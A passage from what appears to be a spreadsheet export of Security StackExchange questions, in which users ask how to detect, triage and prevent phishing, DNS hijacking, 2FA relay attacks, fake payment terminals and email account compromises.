 &lt;p&gt;However then I noticed something really weird, when I tried to visit www.apple.com my browser warned me (Google Chrome) saying this website was not secure. This started ringing alarm bells in my mind, I clicked "Continue Anyway" and was greeted with this page:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/PUGrH.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/PUGrH.png" alt="Apple Phishing"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Being (somewhat of) a web designer/developer I pay attention to the little details on a website and I knew instantly this was not what the Apple homepage looks like, and they certainly didn't prompt you to login on their homepage. I dug in a little deeper to the source code for the page and could see that the source code was way too simplified for a large corporation; the only piece of JS was to verify that the email address was in the right format.&lt;/p&gt;
 &lt;p&gt;I began to suspect maybe my Mac machine had been infected, so I switched to my iPhone (on the same WiFi network), tried &lt;code&gt;www.apple.com&lt;/code&gt;, and got shown the exact same page. To me this sounded like something to do with DNS as the chances that both my devices were infected were very unlikely. I then turned to my router to have a look at its settings. &lt;/p&gt;
 &lt;p&gt;Lo and behold, when digging into the DNS settings I could see that the settings looked a little odd. I had initially set my DNS settings to use Google's servers, although this was set many years ago I knew the were something along the lines of &lt;code&gt;8.8.*.*&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;In my settings however I found the following IP's:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Primary: 185.183.96.174
 Secondary: 8.8.8.8
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I knew straight away that the DNS had been changed, the primary address should have been &lt;code&gt;8.8.4.4&lt;/code&gt;. No one has access to my router administration page aside from me on the network, &lt;strike&gt;and I have disabled access to the router outside of the local network&lt;/strike&gt; I can see outside access was enabled, on initial setup this was definitely switched off. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;My question is: "How could the DNS have been changed/What can I do to prevent this from happening again?&lt;/strong&gt; &lt;/p&gt;
 &lt;p&gt;I try to keep my router firmware up to date (although I was maybe 1 release behind at the time of this post).&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;More about the phishing site:&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;Before I changed the Primary DNS setting back and I wanted to find out more about this phishing site, so I ran &lt;code&gt;ping apple.com&lt;/code&gt; to find the IP address was &lt;code&gt;185.82.200.152&lt;/code&gt;.&lt;/p&gt;
 &lt;p&gt;When I entered this into a browser I could see that the person had created a number of sites to try and capture logins. I suspect they're based in the US; I don't believe Walmart operates outside of the states (at least not in the UK).
 I have reported the IP to the &lt;a href="https://hostsailor.com" rel="noreferrer"&gt;Dubai based web host&lt;/a&gt; and am waiting for a response.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Edit (Router details):&lt;/strong&gt;
 Asus AC87U, FW Version 3.0.0.4.380.7743 (1 release behind)&lt;br&gt;
 I did &lt;strong&gt;not&lt;/strong&gt; have the default passwords set.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Second update:&lt;/strong&gt;&lt;br&gt;
 Host has suspended the account.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/DBYp5.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/DBYp5.png" alt="phishing server directories"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;dns&gt;&lt;router&gt;</t>
  </si>
  <si>
    <t>Strange Problem - DNS Cache Poisoning?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm a developer by trade, but not that well versed in information security. I've encountered a strange problem at home:&lt;/p&gt;
 &lt;p&gt;About three times now in the past year, when I open some website - I'm thrown to some garbage domain which tries to phish me to do some kind of security audit or whatever. First time it happened - I thought I had some malware on my system. I'm normally &lt;strong&gt;very&lt;/strong&gt; cautious. So I pretty much burned my drives and got a fresh everything going. Then it happened again, a few months by, and now again - after moving to a different apartment and on my GFs laptop.&lt;/p&gt;
 &lt;p&gt;I'm suspecting DNS tampering of some sort, but there's no way to verify. Opening the same domain again, just gives me the right page.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;Between now and then I moved apartments, moved ISP, changed router to Google Mesh, changed DNS to 8.8.8.8 on it. So... now even DNS poisoning doesn't make much sense.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;And the websites that do open, are very similar in spirit. I suspect that the problem is persistent. &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;AV software doesn't report any issues.&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Any ideas? And what should I do to prevent this?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;In response to questions:&lt;/em&gt;&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;It happened to three different websites. I honestly don't recall which, I think it's entirely possible that it wasn't any of the &lt;em&gt;big ones&lt;/em&gt;.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Visiting the same site again just opens the normal site. &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Last time it happened yesterday (my GF visited some blog. I will update again if she remembers which site it was originally), and this is the &lt;em&gt;garbage result&lt;/em&gt; I was referring to: &lt;code&gt;http://play6052.try-it-now3.club/?utm_medium=oxxGrJ1EO8rl%2flkgHhDHtdaJe%2b6y3ml38Z%2b1ZX9QaLo%3d&amp;amp;t=main6_mcas2&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;I am in Estonia&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;The browsers and machines are completely different. Even the router and ISPs have changed between issues.&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;strong&gt;EDIT 2&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;The offending original was:
 &lt;a href="http://www.byronkatie.com/2018/07/how-to-be-safe-in-the-abyss-the-work-of-byron-katie/" rel="nofollow noreferrer"&gt;http://www.byronkatie.com/2018/07/how-to-be-safe-in-the-abyss-the-work-of-byron-katie/&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;dns&gt;&lt;dns-spoofing&gt;</t>
  </si>
  <si>
    <t>Triaging malicious URLs</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm quite new to the security field and learning my ways on how to triage certain events.&lt;/p&gt;
 &lt;p&gt;One such alert that I see is "Phishing" when a user clicks on a malicious link. As far as triaging to see if that device is compromised, I'm not too sure what else to do to confirm if it was. &lt;/p&gt;
 &lt;p&gt;When I investigate the event, it gives me the URL which is &lt;code&gt;http://vap1ord1.lijit.com/&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;To triage, I do the below:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Go to virustotal (or other sites) and verify if the URL is indeed malicious&lt;/li&gt;
 &lt;li&gt;Check the device (user laptop) in question and run a scan with the anti virus software&lt;/li&gt;
 &lt;li&gt;Verify that there are no active communication between the device and the phishing website&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Aside from performing the above steps to triage, are there any other steps I can perform to ensure that the device is indeed not compromised?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;phishing&gt;&lt;url&gt;</t>
  </si>
  <si>
    <t>Does this website contain a drive-by download?</t>
  </si>
  <si>
    <t>&lt;p&gt;Like others, I am not really sure if drive by downloads can actually happen. I was given a website with a bit.ly link today. I visited it and then immediately closed it.&lt;/p&gt;
 &lt;p&gt;These are what I have done so far:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Create a virtual machine, and and visit that website in your VM&lt;/li&gt;
 &lt;li&gt;Use the same browser and google for whether the browser has any known exploits&lt;/li&gt;
 &lt;li&gt;Use wget like this wget -O name website&lt;/li&gt;
 &lt;li&gt;Use phishtank which captures it as a JPG&lt;/li&gt;
 &lt;li&gt;Use a LIVE CD which runs on RAM&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;</t>
  </si>
  <si>
    <t>folder and file permission shared host advice</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a website with a webhost company. I wrote a little php/mysql application - no file uploads, just administering data from the DB and creating pdf with TCPDF. There are folders like css and js but nothing else.&lt;/p&gt;
 &lt;p&gt;As I have limited control on the shared host, what would be the best practice to keep the files safe but executable.&lt;/p&gt;
 &lt;p&gt;So let's say:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;index.php
 connect_db.php
 page1.php
 unctions.php
 IMAGES folder
 CSS folder
 TCPDF folder 
 .htaccess
 php.ini
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Update:&lt;/p&gt;
 &lt;p&gt;the server is Linux server with PHP5.2 (optional 5.3) and I have unlimited webspace... The main reason that I am asking because I had an attack and someone managed to put some folder (nedbank) and some email form to phish personal details. Now I am building the whole site from scratch and would like to cover every aspect.&lt;/p&gt;
 &lt;p&gt;I also broke this question to more questions so people might use as well as a good practice resources.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;webserver&gt;</t>
  </si>
  <si>
    <t>Why is TLS for email not pushed aggressively to the users likes HTTPS?</t>
  </si>
  <si>
    <t>&lt;p&gt;Major browsers like Chrome and Firefox are being more and more aggressive at displaying the security level of websites, for instance warning you when you try to enter passwords on a non-HTTPS website.&lt;/p&gt;
 &lt;p&gt;I just saw in GMail that emails from major websites are actually signed and use TLS (for instance an email from PayPal: &lt;em&gt;"signed by mail.paypal.fr&lt;/em&gt;") but you have to click on a small arrow to reveal a menu to see this, and it's written in small without any colors.&lt;/p&gt;
 &lt;p&gt;OK, for the colors, GMail reserves the green for S/MIME;
 But still, is there a reason for not displaying a big "SIGNED by mail.paypal.fr" or "NOT SIGNED" immediately visible? This would prevent a lot of phishing, right? Why such a difference with HTTPS?&lt;/p&gt;
 &lt;h1&gt;EDIT&lt;/h1&gt;
 &lt;p&gt;OK, I guess my question was not very clear.&lt;/p&gt;
 &lt;p&gt;The comment of @shroeder (&lt;a href="https://security.stackexchange.com/q/173215/58613#comment332084_173215"&gt;here&lt;/a&gt;) partly answered it though: dumping non-signed emails is the kind of things I meant as "aggressive pushing". Again I guess I don't know enough about email security because I do have many emails in my GMail where there's not "signed by XXX" in the "more informations" bubble, so I guess it's another signature @shroeder is referring to?&lt;/p&gt;
 &lt;p&gt;I'm sorry if my question was not well formulated; it's just that I received yet another phishing email so I was wondering how come I still have to rely on myself to identify a spoofed email from a legitimate one in an era where all the important websites I have an account on have HTTPS (so they're already signing stuff all the time and my browser will freak out when something is wrong with the signature).&lt;/p&gt;
 &lt;p&gt;Turns out I didn't receive this phishing email on my GMail account but on my work one, on Thunderbird. So I guess my "true" question would be:&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;How come emails from my company are not signed even though they have an HTTPS website? Is it a lot more work? And how come I never saw any info in thunderbird about the "security level" of the emails I receive? Because I know thunderbird does show it when an email is signed with PGP for instance.&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;Instead of telling my personal story I tried to come up with a more "general" question, and... well apparently I didn't go that well.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;email&gt;&lt;digital-signature&gt;&lt;user-interface&gt;</t>
  </si>
  <si>
    <t>Attacker circumventing 2FA. How to defend?</t>
  </si>
  <si>
    <t>&lt;p&gt;Detailed in the &lt;a href="https://theintercept.com/2017/06/05/top-secret-nsa-report-details-russian-hacking-effort-days-before-2016-election/" rel="noreferrer"&gt;latest NSA dump&lt;/a&gt; is a method allegedly used by Russian intelligence to circumvent 2FA. (In this instance Google 2FA with the second factor being a code.)&lt;/p&gt;
 &lt;p&gt;It‚Äôs a fairly obvious scheme and one that I‚Äôm sure must be used regularly. 
 It appears to work like this:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;URL is sent to target via spear phishing, the URL points to attacker
 controlled phishing website that resembles Google Gmail.&lt;/li&gt;
 &lt;li&gt;User send credentials to the phony Gmail.&lt;/li&gt;
 &lt;li&gt;(Assumption) Attacker enters credentials into legitimate Gmail, and checks if a second factor is required.&lt;/li&gt;
 &lt;li&gt;Target receives legitimate second factor.&lt;/li&gt;
 &lt;li&gt;Phony Gmail site prompts target for second factor. Target sends second factor.&lt;/li&gt;
 &lt;li&gt;Attacker enters second factor into legitimate site and successfully authenticates.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;The only way I can see to defend against this attack is by spotting the phony site as being a scam or blocking the phishing site via FW‚Äôs, threat intel etc.&lt;/p&gt;
 &lt;p&gt;Is there any other practical way to defend against such a scheme? &lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/v0023.jpg" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/v0023.jpg" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;multi-factor&gt;</t>
  </si>
  <si>
    <t>Why are there no browser feature or extension to only check the domain and username to prevent phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;One of the recommendations to prevent phishing using look-alike domain names (like www.google.com.phishing.org or &lt;a href="https://en.wikipedia.org/wiki/IDN_homograph_attack" rel="nofollow noreferrer"&gt;IDN homograph attacks&lt;/a&gt;) is to use a password manager or a physical security token like a &lt;a href="https://en.wikipedia.org/wiki/YubiKey" rel="nofollow noreferrer"&gt;YubiKey&lt;/a&gt;, because since it records the domain and username associated to a password to autocomplete it, it won't autocomplete those fields if the domain name is incorrect.&lt;/p&gt;
 &lt;p&gt;That solution seems rather strange to me, because it looks like a hack: it is not the primary usecase of those tools. Indeed, the tool's ability to store passwords is useless in this particular case, though it's its primary usecase.
 However, it still is an interesting solution, that should work in a lot of situations.&lt;/p&gt;
 &lt;p&gt;So why are there no browser feature or extension that would offer to record trusted domain names, and display something when you're on the right domain name, like the "lock" icon for HTTPS or the "star" icon for favorites?&lt;/p&gt;
 &lt;p&gt;It would be simpler to configure, use and maintain, without requiring to store passwords.&lt;/p&gt;
 &lt;p&gt;What would be the drawbacks of such tool?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;attacks&gt;&lt;phishing&gt;&lt;browser-extensions&gt;&lt;dns-domain&gt;</t>
  </si>
  <si>
    <t>Email attachments malicious?</t>
  </si>
  <si>
    <t>&lt;p&gt;So I recently encountered a phishing email, I didn't follow the link of course, but I noticed it had a attachment file of 1KB I didn't download it, but was wondering whether it was possible to be infected with malware just from simply opening the email? I've read numerous times in regards to spam emails to not even open them?&lt;/p&gt;
 &lt;p&gt;I accessed my emails via " outlook.com " using Microsoft Edge if that makes any difference to the circumstance.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;outlook&gt;</t>
  </si>
  <si>
    <t>This facebook page looks different - phishing attempt?</t>
  </si>
  <si>
    <t>&lt;p&gt;After logging on to a public wifi, I was redirected to this page appearing to be from facebook, and being done via https:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/R9sEX.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/R9sEX.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;which looks markedly different from my normal facebook page&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/EVh5H.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/EVh5H.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I understand that if I don't trust a web site, I shouldn't use it.&lt;/p&gt;
 &lt;p&gt;But what's going on here?&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;The page is legitimate, even though it looks different - maybe it's in mobile mode.&lt;/li&gt;
 &lt;li&gt;The wifi is taking me to a page with a domain that looks like "facebook.com", but is a homograph attack.&lt;/li&gt;
 &lt;li&gt;The wifi is telling me that the page has a domain name of facebook.com, but it's lying.&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;wifi&gt;&lt;phishing&gt;&lt;facebook&gt;</t>
  </si>
  <si>
    <t>Is this a phishing email?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've just received the strangest email: &lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/wQKBe.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/wQKBe.png" alt="Possible phishing email"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;I don't understand why anyone would send an email like this. It doesn't look to be asking for credentials of any kind. Is this a scam which is designed for you to engage with the sender?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;spam&gt;</t>
  </si>
  <si>
    <t>How can a customer authenticate EPOS device and make sure it's not fake?</t>
  </si>
  <si>
    <t>&lt;p&gt;In the scenario where customers use magnetic stripe payment cards and are paying via EPOS, a merchant can put a fake EPOS on the table that looks identical to real ones, the customer uses his card on this device and enters his pin.&lt;/p&gt;
 &lt;p&gt;This device records card information and the pin entered and says that it failed to connect to the bank or the payment gateway.&lt;/p&gt;
 &lt;p&gt;Then the merchant tells the client to use another EPOS which is genuine and the payment succeeds. It's like phishing but in real world with physical devices.&lt;/p&gt;
 &lt;p&gt;In this scenario there's no way for the customer to authenticate this EPOS device and make sure that it's the real device and connected to bank network. &lt;/p&gt;
 &lt;p&gt;Are there any methods currently being used to mitigate this risk? What are some countermeasures to put in place, not to fall for this attack?&lt;/p&gt;
 &lt;p&gt;(reminder) these devices are tamper resistant meaning you can't open them up and manipulate the circuitry but the scenario above, uses a totally fake device that just looks like real EPOS devices.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;hardware&gt;&lt;payment-gateway&gt;&lt;magnetic-stripe-card&gt;</t>
  </si>
  <si>
    <t>What can happen if someone gets a hold of a scan of someone else's passport?</t>
  </si>
  <si>
    <t>&lt;p&gt;Or: "Do I need to be concerned about emailing people scans of my passport if they want to verify my identity?"&lt;/p&gt;
 &lt;p&gt;Is there anything anyone can do with the information on the main page of the passport that could be used to hurt the owner in the short or long term?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Spear phishing data set</t>
  </si>
  <si>
    <t>&lt;p&gt;Are there any existing data sets of spear phishing emails available?&lt;/p&gt;
 &lt;p&gt;I've found a bunch of data sets of phishing emails, but that's not what I'm looking for. I'm not looking for mass phishing campaigns. Rather, I'm interested in spear phishing: targeted social engineering emails. I've checked phishing archives, like &lt;a href="https://www.phishtank.com/" rel="nofollow"&gt;Phishtank&lt;/a&gt;, but haven't found any that have separated out the ones that are targeted. My goal is to study what real spear phishing emails, as observed in the wild, look like.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>How to distinguish between a scam and a genuine call?</t>
  </si>
  <si>
    <t>&lt;p&gt;My bank called me the other day and the person who spoke to me failed to give me a single evidence that he is calling from my bank.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;The bank number is hidden just like many other companies maybe because they use VOIP to make calls or they don't want you to ring them back on the number they call you from.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;The person I spoke to refused my proposal to &lt;em&gt;mutual verification&lt;/em&gt; of our identities when I asked him to tell me my account number since all the information he revealed to know about me was my name and phone number which are available to the public. &lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>Received Google 2FA Code via SMS from two unknown phone numbers</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently encountered a strange incident regarding the 2FA of my Google Account.&lt;/p&gt;
 &lt;p&gt;The user Dunois has described a very similar occurrence in this post: &lt;a href="https://security.stackexchange.com/questions/225298/functional-google-2fa-code-via-sms-received-from-a-random-but-in-use-mobile"&gt;Functional Google 2FA code (via SMS) received from a random (but in use) mobile phone number&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;My experience is a bit different, in the the code itself is also suspicious.&lt;/p&gt;
 &lt;p&gt;The other day, I set up 2FA for the Google Workspace Account that I use at work. I (foolishly) chose the SMS option, and entered my phone number. The code that I received didn't come from the usual phone number simply marked as &amp;quot;Google&amp;quot;, but from what appeared to be a regular phone number from the UK (+447907180..., apparently an O2 number). Also it didn't come with the usual message (&amp;quot;G-###### is your...), it simply had six digits in it, with no further message.&lt;/p&gt;
 &lt;p&gt;I didn't use the code, because it just freaked me out a bit. Instead I requested another code, this time receiving a message from the usual &amp;quot;Google&amp;quot; number. I had not switched websites, I literally clicked the same button twice, receiving messages from two different numbers. I can also rule out falling for a spoofed website, since I've navigated to my account settings from my Gmail, which I have saved as a bookmark in my browser.&lt;/p&gt;
 &lt;p&gt;The next day, I tried to reproduce the same thing with my private Google account, which already had 2FA activated. When I switched it to SMS, the same thing happened again:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/kEHRM.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/kEHRM.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;This time the code came from a German number (I live in Germany), but had the same format as the last one. Again though, I didn't enter the code.
 On both accounts I haven't been able to receive another message from the two numbers since. Every time I request a new code, it will come from the old &amp;quot;Google&amp;quot; number. Friends that tried it for themselves were getting the regular messages as well.&lt;/p&gt;
 &lt;p&gt;My Google account shows no suspicious activity, I am not missing any data, nor have I been locked out of either my accounts.&lt;/p&gt;
 &lt;p&gt;I called both numbers, the German one seems to be active, but goes straight to voicemail. The British one is apparently unknown by my provider T-Mobile.&lt;/p&gt;
 &lt;p&gt;So my question is: Do I have to worry about my account? And if not, what is going on here? If it is a scam of some sort, where's the scam? Could this be some strange glitch on Google's side? Has Google just used some third party 2FA service provider to send me the message? And if so, why would they settle for a company that make their messages look like strange phishing attempts?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;multi-factor&gt;&lt;google&gt;&lt;sms&gt;</t>
  </si>
  <si>
    <t>Is there any good reason not to salt/hash passwords you store?</t>
  </si>
  <si>
    <t>&lt;p&gt;Two organisations I frequently deal with (including my bank) ask me my password to authenticate myself with them... well... they ask for "random" characters from my password.&lt;/p&gt;
 &lt;p&gt;As I understand it, this means that the password cannot be being stored salted and hashed? It has to be being stored in a retrievable format. Whether that's plaintext or some way of reversible encryption.&lt;/p&gt;
 &lt;p&gt;My question is whether this can be justified? Is this really a better idea?&lt;/p&gt;
 &lt;p&gt;In my mind the benefits are:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;replay attacks are "harder" (hah!)&lt;/li&gt;
 &lt;li&gt;customer hopefully realises phishing requesting entire password is phishing&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;But is that really good enough to offset the big disadvantage that it is technically very, very possible for your entire password store to be obtained?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;</t>
  </si>
  <si>
    <t>Is it possible to defend against a backscatter attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;Yesterday, some spammer on the other side of the world decided to send out a ton of phishing mails with my business mail address as both &lt;code&gt;From&lt;/code&gt; address and envelope sender.&lt;/p&gt;
 &lt;p&gt;The usual best practices are in place: My provider (apparently) uses &lt;a href="https://en.wikipedia.org/wiki/Bounce_Address_Tag_Validation" rel="nofollow noreferrer"&gt;Bounce Address Tag Validation&lt;/a&gt;, and our &lt;a href="https://en.wikipedia.org/wiki/Sender_Policy_Framework" rel="nofollow noreferrer"&gt;Sender Policy Framework&lt;/a&gt; record ends with &lt;code&gt;-all&lt;/code&gt;. Thus, the amount of "regular" NDRs was a lot smaller than it could have been.&lt;/p&gt;
 &lt;p&gt;Still, I received about 1-3 auto-replies per minute: "I'm on vacation...", "Thanks for contacting us...", "You message contained malicious content...", "I'm out of office...", "Mr. X is no longer with the firm...", "Our e-mail address has changed...", "Your message has been received and a support ticket has been generated..." - just to name a few. Obviously from around the globe and in a multitude of different languages. Quite an interesting read, actually, if you don't have anything better to do.&lt;/p&gt;
 &lt;p&gt;Unfortunately, I do have better things to do, and, fortunately, some of the auto-replies included a copy of the original message, allowing me to determine the spammer's IP address and get him (or the poor guy whose server he hacked) shut down by his hosting provider.&lt;/p&gt;
 &lt;p&gt;Still, I was wondering: 1-3 unsolicited mails per minute I can handle next to my "regular" work, but if the spammer had used more hosts (or even a bot network), my mail account would have effectively been DDOS'ed into uselessness.&lt;/p&gt;
 &lt;p&gt;Is there anything one can do to &lt;em&gt;defend&lt;/em&gt; against this kind of "backscatter auto-reply attack"?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ddos&gt;&lt;email-spoofing&gt;&lt;spf&gt;</t>
  </si>
  <si>
    <t>Has this PC been hacked? What's going on?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm reasonably technically competent, but I don't know how to interpret this PC issue. As its a real-world incident, there's some back-story.&lt;/p&gt;
 &lt;p&gt;I'm in the UK. The suspect PC runs Win8.1 up to date, used for simple desktop stuff by a family member. There are about 4 other PCs, all pretty much identically built, on the same LAN, behind an OPNSense (pfSense fork) router.&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;About 5th March 2020, the family member asked me to look at their PC. A bunch of 4 or 5 remote usage softwares had been installed within a 10 minute period from original downloads (github or author's DL pages) - AnyVPN, TeamViewer etc - clearly from some phishing link. First time in many years, the family member is pretty good. There wasn't any sign of actual damage - none of the SW was connected, but it could have been a false trail with a different malware less visible. I took the disk from that system offline, connected it to a "known good" PC and scanned with Kaspersky. Nothing. Apparently clean. But even so, I deleted and installed a complete clean new system and software on that PC, to ensure it was clean.&lt;br/&gt;&amp;nbsp;&lt;/li&gt;
 &lt;li&gt;On 30 April, the relative reported being locked out of their email for the last 2 days. Email for them is Outlook 2010 + Gmail + IMAP, with a long hard password. (They also use an android app for email when away from home, but with Corona lockdown haven't been out.) Google Web UI reported account lockout due to a suspect login attempt from some IP address in Holland. But it didnt provide a list of actual logins to check for actual breach (too many days/logins ago). I wondered if this might be his mobile email, using Vodafone European IP in Holland or something, but the IP wasnt a telco. Google reported a POW change but the relative had also tried different PWs to try and log in before telling me. I changed the password myself to be sure, more because Google insisted than because I thought the hard password was guessed. So admittedly I changed it lazily (suffixed old PW with "1" to keep it easy for them). No further issues....&lt;br/&gt;&amp;nbsp;&lt;/li&gt;
 &lt;li&gt;Today he reported he has been locked out of his email again. Same kind of thing. French IP this time (185.93.2.181), attempted on 12 May (says Google) to login using his new PW and was blocked as a precaution. This time there is history - but the only successful logins are our home IP address. IP doesnt seem to mean anything, doesnt seem to be a Tor exit.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;So I'm unclear how to interpret. This is as far as I can work it out:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;The PC's disk was wiped. Other systems on the LAN arent showing mysetrious Google security events. The original phish installed official (digital sig/official DL site) software. So it doesn't seem likely that overt or covert malicious stuff persisted from the 5 March event.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;On 2 subsequent occasions, Google reports security issues with an attempted login from Dutch (28 April) and French (12 May) IPs. The addresses don't mean anything to me. They aren't mobile or Tor either, apparently. There doesn't seem to be actual breaches. I can't tell if a password was taken or not, because I don't know whether it was used or my relative did it, but I changed the password anyway.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;The current (3rd) event is worrying. After the 2nd event when I changed the PW, I would expect that put an end to any issues with unaccounted logins, but it didn't. No other machine here has had such logins. But the changed PW after the 2nd attempt was one I myself set via the browser on a clean OS. If that's not it, then what is Google alerting on? Was there even a breach at all after the March incident, and is Google being over-cautious? Could it be something silly like his mobile phone provider's EU IP? I don't see clearly.&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;So Im not sure at all, what to make of it, which limits what responses to choose......&lt;/p&gt;
 &lt;p&gt;ideas?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;As suggested by @schroeder, I checked GMail itself. The relative's email should be mutually shared by/delegable to/usable by one other user, his wife. &lt;/p&gt;
 &lt;p&gt;On his account, no other delegated users are shown (I'm not 100% sure if there could be other ways to login via Google, I might need guidance what to check), and the recovery details are unchanged and the recovery email is almost certainly unbreached (almost never logged in, credentials known to me only and not online).&lt;/p&gt;
 &lt;p&gt;I then checked his wife's account, in case she's the backdoor. No unexpected delegation on hers, no evidence of logins from unexpected places, no evidence of Google Security alert hiostory or emails (although they could have been wiped), no sign of a breach in Google Account security or recent logins. Also usually she's more careful than he is, and the March phishing attack was his machine not hers.&lt;/p&gt;
 &lt;p&gt;Does this exclude a GMail related intrusion or are there other things I should check? I'm not that familiar with GMail security but it seems straightforward...?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;gmail&gt;&lt;incident-analysis&gt;&lt;breach&gt;</t>
  </si>
  <si>
    <t>Phishing urls from shnpoc.net/McAfee?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was looking into my websites traffic and found few entries from a subdomain for &lt;code&gt;shnpoc.net&lt;/code&gt; domain. And when I looked into it, it was transparent proxying my website.&lt;br&gt;
